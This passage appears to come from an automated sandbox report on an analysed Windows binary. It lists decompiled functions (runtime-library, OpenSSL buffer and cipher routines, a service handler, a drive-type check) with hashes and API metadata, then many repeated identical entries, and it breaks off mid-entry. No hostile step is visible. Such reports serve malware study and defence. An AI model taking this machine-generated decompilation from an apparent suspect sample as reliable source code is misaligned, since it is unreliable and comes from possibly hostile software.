                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 38e4cec093b4bb8ca65e5deb693cbde4f195bf1ea45dcc304f7468a32887ad1a
                                                              • Instruction ID: 789d27773ffe6615ccf2a35bcb4994489badac61cc7e899c6a6047270b6214f8
                                                              • Opcode Fuzzy Hash: 38e4cec093b4bb8ca65e5deb693cbde4f195bf1ea45dcc304f7468a32887ad1a
                                                              • Instruction Fuzzy Hash: FD31D031A00246EFCB30DF64C880AAE3BB5EF95312F15C5A9E4798B5A1D730DE80DB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E00C73DCB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed int _t13;
                                                              				void* _t25;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t29;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              
                                                              				_t31 = __eflags;
                                                              				_t26 = __edi;
                                                              				_t25 = __edx;
                                                              				_t22 = __ebx;
                                                              				_push(0xc);
                                                              				_push(0xcbfde8);
                                                              				E00C70838(__ebx, __edi, __esi);
                                                              				_t29 = E00C74108(__ebx, _t31);
                                                              				_t13 =  *0xcc634c; // 0xfffffffe
                                                              				if(( *(_t29 + 0x70) & _t13) == 0) {
                                                              					L6:
                                                              					E00C6FD40(_t22, _t26, 0xc);
                                                              					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                              					_t8 = _t29 + 0x6c; // 0x6c
                                                              					_t27 =  *0xcc6430; // 0xcc6358
                                                              					 *((intOrPtr*)(_t30 - 0x1c)) = E00C73D8D(_t8, _t25, _t27);
                                                              					 *(_t30 - 4) = 0xfffffffe;
                                                              					E00C73E35();
                                                              				} else {
                                                              					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                                                              					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                                                              						goto L6;
                                                              					} else {
                                                              						_t29 =  *((intOrPtr*)(E00C74108(_t22, _t33) + 0x6c));
                                                              					}
                                                              				}
                                                              				if(_t29 == 0) {
                                                              					E00C6B253(_t25, 0x20);
                                                              				}
                                                              				return E00C7087D(_t29);
                                                              			}










                                                              APIs
                                                              • __getptd.LIBCMT ref: 00C73DD7
                                                                • Part of subcall function 00C74108: __getptd_noexit.LIBCMT ref: 00C7410B
                                                                • Part of subcall function 00C74108: __amsg_exit.LIBCMT ref: 00C74118
                                                              • __getptd.LIBCMT ref: 00C73DEE
                                                              • __amsg_exit.LIBCMT ref: 00C73DFC
                                                              • __lock.LIBCMT ref: 00C73E0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                              • String ID:
                                                              • API String ID: 3521780317-0
                                                              • Opcode ID: e0ba8077d887e23e55f587bafca0567ea0532018bbee28e629f58df5471ada49
                                                              • Instruction ID: 53a7e4d1b1750ee013586e140d05f3702618074f5ebaecef5f767270e363d301
                                                              • Opcode Fuzzy Hash: e0ba8077d887e23e55f587bafca0567ea0532018bbee28e629f58df5471ada49
                                                              • Instruction Fuzzy Hash: CBF09A32910744CBD720FBB58802B4D7BA0AF40721F64C119E468AB2D2CB74AB41FB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00BA98C0(void* __ebp, intOrPtr* _a4, intOrPtr _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t20;
                                                              				intOrPtr _t32;
                                                              				intOrPtr* _t46;
                                                              				intOrPtr _t47;
                                                              
                                                              				_t47 = _a8;
                                                              				_t46 = _a4;
                                                              				_t16 =  *_t46;
                                                              				if( *_t46 >= _t47) {
                                                              					L4:
                                                              					 *_t46 = _t47;
                                                              					return _t47;
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t46 + 8)) < _t47) {
                                                              						if(_t47 <= 0x5ffffffc) {
                                                              							_t5 = _t47 + 3; // 0xbab08d
                                                              							_t32 = (0xaaaaaaab * _t5 >> 0x20 >> 1) + (0xaaaaaaab * _t5 >> 0x20 >> 1) + (0xaaaaaaab * _t5 >> 0x20 >> 1) + (0xaaaaaaab * _t5 >> 0x20 >> 1);
                                                              							if(( *(_t46 + 0xc) & 0x00000001) == 0) {
                                                              								_t13 = _t46 + 4; // 0x681175c0
                                                              								_t20 = E00BA3500(_t47, __ebp,  *_t13, _t32, "crypto\\buffer\\buffer.c", 0x60);
                                                              							} else {
                                                              								_t20 = E00BA9870(_t32, _t46, _t32);
                                                              							}
                                                              							if(_t20 != 0) {
                                                              								 *((intOrPtr*)(_t46 + 4)) = _t20;
                                                              								 *((intOrPtr*)(_t46 + 8)) = _t32;
                                                              								E00C6BB40(_t46,  *_t46 + _t20, 0, _t47 -  *_t46);
                                                              								 *_t46 = _t47;
                                                              								return _t47;
                                                              							} else {
                                                              								E00B98310(_t46, 7, 0x64, 0x41, "crypto\\buffer\\buffer.c", 0x62);
                                                              								return 0;
                                                              							}
                                                              						} else {
                                                              							E00B98310(_t46, 7, 0x64, 0x41, "crypto\\buffer\\buffer.c", 0x59);
                                                              							return 0;
                                                              						}
                                                              					} else {
                                                              						_t4 = _t46 + 4; // 0x681175c0
                                                              						_t38 =  *_t4;
                                                              						if( *_t4 != 0) {
                                                              							E00C6BB40(_t46, _t38 + _t16, 0, _t47 - _t16);
                                                              						}
                                                              						goto L4;
                                                              					}
                                                              				}
                                                              			}











                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\buffer\buffer.c
                                                              • API String ID: 2102423945-2193715570
                                                              • Opcode ID: e68a69cbdaf7049a579d9e870196ee6e99f1397a2ec32c953e6298e813ffdfac
                                                              • Instruction ID: 6f17f765f79838b43097501f94394706e90cc293f5138137b956207ea95d673c
                                                              • Opcode Fuzzy Hash: e68a69cbdaf7049a579d9e870196ee6e99f1397a2ec32c953e6298e813ffdfac
                                                              • Instruction Fuzzy Hash: 602129B1B483117BD6106A68FC82B66F3D5AB92F14F14857AFA09D72C6E7B4EC5183C0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00B95C50(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t21;
                                                              				void* _t23;
                                                              				signed int _t25;
                                                              				intOrPtr _t33;
                                                              				void* _t36;
                                                              				signed int _t37;
                                                              				intOrPtr _t48;
                                                              				intOrPtr* _t53;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              
                                                              				_t53 = _a4;
                                                              				_t21 =  *_t53;
                                                              				if(( *(_t21 + 0x10) & 0x00100000) == 0) {
                                                              					_t48 =  *((intOrPtr*)(_t21 + 4));
                                                              					__eflags = _t48 - 0x20;
                                                              					if(__eflags > 0) {
                                                              						E00BA7C70(_t36, _t48, _t53, _t54, __eflags, "assertion failed: b <= sizeof ctx->buf", "crypto\\evp\\evp_enc.c", 0x188);
                                                              						_t55 = _t55 + 0xc;
                                                              					}
                                                              					__eflags = _t48 - 1;
                                                              					if(_t48 != 1) {
                                                              						__eflags =  *(_t53 + 0x5c) & 0x00000100;
                                                              						_t37 =  *(_t53 + 0xc);
                                                              						if(( *(_t53 + 0x5c) & 0x00000100) == 0) {
                                                              							_t23 = _t48 - _t37;
                                                              							__eflags = _t37 - _t48;
                                                              							if(_t37 < _t48) {
                                                              								E00C6BB40(_t48, _t37 + _t53 + 0x30, _t23, _t23);
                                                              								_t55 = _t55 + 0xc;
                                                              							}
                                                              							_t25 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x18))))(_t53, _a8, _t53 + 0x30, _t48);
                                                              							__eflags = _t25;
                                                              							if(_t25 != 0) {
                                                              								 *_a12 = _t48;
                                                              							}
                                                              							return _t25;
                                                              						} else {
                                                              							__eflags = _t37;
                                                              							if(_t37 == 0) {
                                                              								 *_a12 = 0;
                                                              								return 1;
                                                              							} else {
                                                              								E00B98310(_t48, 6, 0x7f, 0x8a, "crypto\\evp\\evp_enc.c", 0x191);
                                                              								__eflags = 0;
                                                              								return 0;
                                                              							}
                                                              						}
                                                              					} else {
                                                              						 *_a12 = 0;
                                                              						return _t48;
                                                              					}
                                                              				} else {
                                                              					_t33 =  *((intOrPtr*)( *((intOrPtr*)(_t21 + 0x18))))(_t53, _a8, 0, 0);
                                                              					if(_t33 >= 0) {
                                                              						 *_a12 = _t33;
                                                              						return 1;
                                                              					} else {
                                                              						return 0;
                                                              					}
                                                              				}
                                                              			}
















                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: assertion failed: b <= sizeof ctx->buf$crypto\evp\evp_enc.c
                                                              • API String ID: 0-1342495747
                                                              • Opcode ID: f5521c1635edf1060d993381e1eaeed2919f78dbd5e072c4cfbe178896470ce5
                                                              • Instruction ID: 85b16e6c76538e959e6261d77e88c14d802a7d0e701596ec156199503ee9bd3b
                                                              • Opcode Fuzzy Hash: f5521c1635edf1060d993381e1eaeed2919f78dbd5e072c4cfbe178896470ce5
                                                              • Instruction Fuzzy Hash: 1521D1713443006BDB25EB18EC41FAA73E5EFD5714F0444A9F9458B284D7B0EC8287A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E00B92040(intOrPtr _a4) {
                                                              				void* _t3;
                                                              				intOrPtr _t5;
                                                              				int _t7;
                                                              				intOrPtr _t9;
                                                              				void* _t10;
                                                              				void* _t11;
                                                              
                                                              				_t3 = _a4 - 1;
                                                              				if(_t3 == 0) {
                                                              					 *0xcc9f9c = 0;
                                                              					 *0xcc9fa8 = 0;
                                                              					_t5 =  *0xcc7460;
                                                              					 *0xcc9fa4 = _t5;
                                                              					 *0xcc7460 = _t5 + 1;
                                                              					_t7 =  *0xcc9fac; // 0x0
                                                              					 *0xcc9f94 = 3;
                                                              					 *0xcc9f98 = 1;
                                                              					SetServiceStatus(_t7, 0xcc9f90);
                                                              					_t9 =  *0xcc9f94; // 0x1
                                                              					_t10 = E00B91C10(_t9, 0);
                                                              					__imp__#116();
                                                              					return _t10;
                                                              				}
                                                              				_t11 = _t3 - 4;
                                                              				if(_t11 != 0) {
                                                              					return _t11;
                                                              				} else {
                                                              					 *0xcc9f94 = 1;
                                                              					return _t11;
                                                              				}
                                                              			}










                                                              APIs
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B92093
                                                              • WSACleanup.WS2_32 ref: 00B920A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: CleanupServiceStatus
                                                              • String ID: T1u
                                                              • API String ID: 3425175960-2799174939
                                                              • Opcode ID: c9aaeb1fad9078e34e310939384231bddb02c2b4dd8388fd1e8008fc328d488d
                                                              • Instruction ID: f111b2a0d2b56efb11c3d5d1a68ed38b16280d6d9900e90641645349a8dee633
                                                              • Opcode Fuzzy Hash: c9aaeb1fad9078e34e310939384231bddb02c2b4dd8388fd1e8008fc328d488d
                                                              • Instruction Fuzzy Hash: A5F0DFB1A042019FEB44CFA8EE4DF0A7BE0F768301B02843DE109C6364CB769840CF04
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00C78EFF(char _a4, char _a5, char _a6, char _a7) {
                                                              				char _t7;
                                                              				int _t10;
                                                              
                                                              				_t7 = _a4;
                                                              				if(_t7 != 0) {
                                                              					_a4 = _t7 + 0x40;
                                                              					_a5 = 0x3a;
                                                              					_a6 = 0x5c;
                                                              					_a7 = 0;
                                                              					_t10 = GetDriveTypeA( &_a4);
                                                              					if(_t10 == 0 || _t10 == 1) {
                                                              						return 0;
                                                              					} else {
                                                              						goto L1;
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return 1;
                                                              				}
                                                              			}






                                                              APIs
                                                              • GetDriveTypeA.KERNEL32(?,?,00C78F4F,?,00000000,00000007,00000007,?,00C79094,00000000,?,00000104,00CBFFA0,0000000C,00C70CDE,?), ref: 00C78F25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: DriveType
                                                              • String ID: :$\
                                                              • API String ID: 338552980-1166558509
                                                              • Opcode ID: 0158769adb98ab09cd2c8939b386d4d90dd4e099d30938c2cba0217ba071b56d
                                                              • Instruction ID: 97669508893af7383066794b7d75b667e32164a0c87dfcc737bdbfeacc8501a1
                                                              • Opcode Fuzzy Hash: 0158769adb98ab09cd2c8939b386d4d90dd4e099d30938c2cba0217ba071b56d
                                                              • Instruction Fuzzy Hash: 9FE0D8302482885DEF518AB9884879A3FCD8B51288F14C055F95CCE101D570C74A8351
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
